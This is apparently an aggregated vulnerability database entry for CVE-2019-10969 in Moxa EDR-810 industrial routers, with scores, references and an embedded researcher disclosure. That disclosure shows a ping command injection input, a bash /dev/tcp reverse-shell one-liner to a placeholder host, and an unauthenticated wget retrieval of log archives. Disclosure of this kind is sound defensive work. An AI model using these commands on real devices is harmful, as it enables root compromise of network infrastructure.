ID

VAR-201910-1593


CVE

CVE-2019-10969


TITLE

Moxa EDR 810 Input validation vulnerability

Trust: 0.8

sources: JVNDB: JVNDB-2019-010769

DESCRIPTION

Moxa EDR 810, all versions 5.1 and prior, allows an authenticated attacker to abuse the ping feature to execute unauthorized commands on the router, which may allow an attacker to perform remote code execution. Moxa EDR 810 Contains an input validation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Moxa EDR-810 is a highly integrated industrial multi-port security router with firewall / NAT / VPN and hosted Layer 2 switch functions. Moxa EDR-810 5.1 and earlier has a remote code execution vulnerability. An attacker could use this vulnerability to implement remote code execution. Moxa EDR 810 is an Ethernet router manufactured by Moxa Company in Taiwan, China. During an engagement for a client, RandoriSec found 2 vulnerabilities on Moxa EDR-810 Series Secure Routers. The first one is a command injection vulnerability found on the CLI allowing an authenticated user to obtain root privileges. And the other one is an improper access control found on the web server allowing to retrieve log files. As usual, we reported those issues directly to Moxa and ICS-CERT (Industrial Control Systems Cyber Emergency Response Team) in order to “responsible disclose†them. The ICS-CERT advisory was published on their website and a new EDR-810 firmware was provided by Moxa. Many thanks to Moxa and ICS-CERT teams for their help. Advisory The following two product vulnerabilities were identified in Moxa’s EDR-810 Series Secure Routers, all versions 5.1 and prior are vulnerable: CVE-2019-10969: An exploitable command injection vulnerability exists in the CLI functionality, which is provided by the Telnet and SSH services. As the CLI is executed with root privileges, it is possible to obtain a root shell on the device. A CVSS v3 base score of 7.2 has been calculated. CVE-2019-10963: An unauthenticated attacker can retrieve all the log files (Firewall, IPSec and System) from the webserver. In order to exploit the issue, a legitimate user had to export the log files previously. A CVSS v3 base score of 4.3 has been calculated. Exploitation CVE-2019-10969 - Ping Command Injection The Telnet and SSH services provide a Command Line Interface (CLI), which is a restricted shell allowing to perform a subset of actions on the device. The ping function of the CLI is vulnerable to command injection. It is possible to specify a specific hostname, such as ($/bin/bash), in order to obtain a shell as shown below: Ping command injection Due to limitations on the CLI, it is not possible to use the shell as is. The attacker can use a reverse shell as shown below: bash -i >& /dev/tcp/YOUR_IP_ADDRESS/1234 0>&1 CVE-2019-10963 - Missing Access Control On Log Files When a legitimate user (admin or configadmin for instance) export the logs files from the MOXA router. The files are stored at the root of the webserver, as follow: http://IP_ADDRESS_MOXA/MOXA_All_LOG.tar.gz An attacker can retrieve this archive without being authenticated on the Web interface as shown below: # wget http://192.168.0.1/MOXA_All_LOG.tar.gz --2019-02-13 17:35:19-- http://192.168.0.1/MOXA_All_LOG.tar.gz Connexion à 192.168.0.1:80... connecté. requête HTTP transmise, en attente de la réponse... 200 OK Taille : 15724 (15K) [text/plain] Sauvegarde en : " MOXA_All_LOG.tar.gz " MOXA_All_LOG.tar.gz 100%[====================================================================================================================================>] 15,36K --.-KB/s ds 0s 2019-02-13 17:35:19 (152 MB/s) - " MOXA_All_LOG.tar.gz " sauvegardé [15724/15724] # tar ztvf MOXA_All_LOG.tar.gz drwxr-xr-x admin/root 0 2019-02-13 11:55 moxa_log_all/ -rw-r--r-- admin/root 326899 2019-02-13 11:55 moxa_log_all/MOXA_Firewall_LOG.ini -rw-r--r-- admin/root 156 2019-02-13 11:55 moxa_log_all/MOXA_IPSec_LOG.ini -rw-r--r-- admin/root 68465 2019-02-13 11:55 moxa_log_all/MOXA_LOG.ini Mitigation It is recommended to install at least the firmware version 5.3 from Moxa website. Timeline 2019-02-24: Vendor Disclosure 2019-02-24: Advisory sent to ICS-CERT 2019-09-30: Advisory published by Moxa 2019-10-01: Advisory published by ICS-CERT

Trust: 2.34

sources: NVD: CVE-2019-10969 // JVNDB: JVNDB-2019-010769 // CNVD: CNVD-2019-43363 // VULHUB: VHN-142568 // PACKETSTORM: 154943

IOT TAXONOMY

category:['Network device']sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2019-43363

AFFECTED PRODUCTS

vendor:moxamodel:edr-810scope:lteversion:5.1

Trust: 1.0

vendor:moxamodel:edr-810 seriesscope:lteversion:5.1

Trust: 0.8

vendor:moxamodel:edr-810scope:lteversion:<=5.1

Trust: 0.6

vendor:moxamodel:edr-810scope:eqversion: -

Trust: 0.6

vendor:moxamodel:edr-810scope:eqversion:5.1

Trust: 0.6

sources: CNVD: CNVD-2019-43363 // JVNDB: JVNDB-2019-010769 // CNNVD: CNNVD-201910-006 // NVD: CVE-2019-10969

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2019-10969
value: HIGH

Trust: 1.0

NVD: CVE-2019-10969
value: HIGH

Trust: 0.8

CNVD: CNVD-2019-43363
value: MEDIUM

Trust: 0.6

CNNVD: CNNVD-201910-006
value: HIGH

Trust: 0.6

VULHUB: VHN-142568
value: MEDIUM

Trust: 0.1

nvd@nist.gov: CVE-2019-10969
severity: MEDIUM
baseScore: 6.5
vectorString: AV:N/AC:L/AU:S/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: SINGLE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 8.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

CNVD: CNVD-2019-43363
severity: MEDIUM
baseScore: 6.5
vectorString: AV:N/AC:L/AU:S/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: SINGLE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 8.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

VULHUB: VHN-142568
severity: MEDIUM
baseScore: 6.5
vectorString: AV:N/AC:L/AU:S/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: SINGLE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 8.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

nvd@nist.gov: CVE-2019-10969
baseSeverity: HIGH
baseScore: 7.2
vectorString: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: HIGH
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 1.2
impactScore: 5.9
version: 3.1

Trust: 1.0

NVD: CVE-2019-10969
baseSeverity: HIGH
baseScore: 7.2
vectorString: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: HIGH
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: NONE
impactScore: NONE
version: 3.0

Trust: 0.8

sources: CNVD: CNVD-2019-43363 // VULHUB: VHN-142568 // JVNDB: JVNDB-2019-010769 // CNNVD: CNNVD-201910-006 // NVD: CVE-2019-10969

PROBLEMTYPE DATA

problemtype:CWE-20

Trust: 1.9

sources: VULHUB: VHN-142568 // JVNDB: JVNDB-2019-010769 // NVD: CVE-2019-10969

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201910-006

TYPE

input validation error

Trust: 0.6

sources: CNNVD: CNNVD-201910-006

CONFIGURATIONS

sources: JVNDB: JVNDB-2019-010769

PATCH

title:EDR-810 Seriesurl:https://www.moxa.com/en/support/search?psid=48041

Trust: 0.8

title:Patch for Moxa EDR-810 Remote Code Execution Vulnerabilityurl:https://www.cnvd.org.cn/patchInfo/show/192699

Trust: 0.6

title:Moxa EDR 810 Series Security vulnerabilitiesurl:http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=98758

Trust: 0.6

sources: CNVD: CNVD-2019-43363 // JVNDB: JVNDB-2019-010769 // CNNVD: CNNVD-201910-006

EXTERNAL IDS

db:NVDid:CVE-2019-10969

Trust: 3.2

db:ICS CERTid:ICSA-19-274-03

Trust: 2.5

db:PACKETSTORMid:154943

Trust: 1.8

db:JVNDBid:JVNDB-2019-010769

Trust: 0.8

db:CNNVDid:CNNVD-201910-006

Trust: 0.7

db:CNVDid:CNVD-2019-43363

Trust: 0.6

db:AUSCERTid:ESB-2019.3697

Trust: 0.6

db:VULHUBid:VHN-142568

Trust: 0.1

sources: CNVD: CNVD-2019-43363 // VULHUB: VHN-142568 // JVNDB: JVNDB-2019-010769 // PACKETSTORM: 154943 // CNNVD: CNNVD-201910-006 // NVD: CVE-2019-10969

REFERENCES

url:https://www.us-cert.gov/ics/advisories/icsa-19-274-03

Trust: 2.5

url:https://nvd.nist.gov/vuln/detail/cve-2019-10969

Trust: 2.1

url:http://packetstormsecurity.com/files/154943/moxa-edr-810-command-injection-information-disclosure.html

Trust: 1.7

url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-10969

Trust: 0.8

url:https://www.auscert.org.au/bulletins/esb-2019.3697/

Trust: 0.6

url:http://192.168.0.1/moxa_all_log.tar.gz

Trust: 0.1

url:http://ip_address_moxa/moxa_all_log.tar.gz

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2019-10963

Trust: 0.1

sources: CNVD: CNVD-2019-43363 // VULHUB: VHN-142568 // JVNDB: JVNDB-2019-010769 // PACKETSTORM: 154943 // CNNVD: CNNVD-201910-006 // NVD: CVE-2019-10969

CREDITS

RandoriSec

Trust: 0.7

sources: PACKETSTORM: 154943 // CNNVD: CNNVD-201910-006

SOURCES

db:CNVDid:CNVD-2019-43363
db:VULHUBid:VHN-142568
db:JVNDBid:JVNDB-2019-010769
db:PACKETSTORMid:154943
db:CNNVDid:CNNVD-201910-006
db:NVDid:CVE-2019-10969

LAST UPDATE DATE

2024-11-23T22:21:25.017000+00:00


SOURCES UPDATE DATE

db:CNVDid:CNVD-2019-43363date:2019-12-03T00:00:00
db:VULHUBid:VHN-142568date:2019-10-23T00:00:00
db:JVNDBid:JVNDB-2019-010769date:2019-10-23T00:00:00
db:CNNVDid:CNNVD-201910-006date:2019-10-28T00:00:00
db:NVDid:CVE-2019-10969date:2024-11-21T04:20:16.020

SOURCES RELEASE DATE

db:CNVDid:CNVD-2019-43363date:2019-12-02T00:00:00
db:VULHUBid:VHN-142568date:2019-10-08T00:00:00
db:JVNDBid:JVNDB-2019-010769date:2019-10-23T00:00:00
db:PACKETSTORMid:154943date:2019-10-23T18:25:18
db:CNNVDid:CNNVD-201910-006date:2019-10-01T00:00:00
db:NVDid:CVE-2019-10969date:2019-10-08T19:15:09.963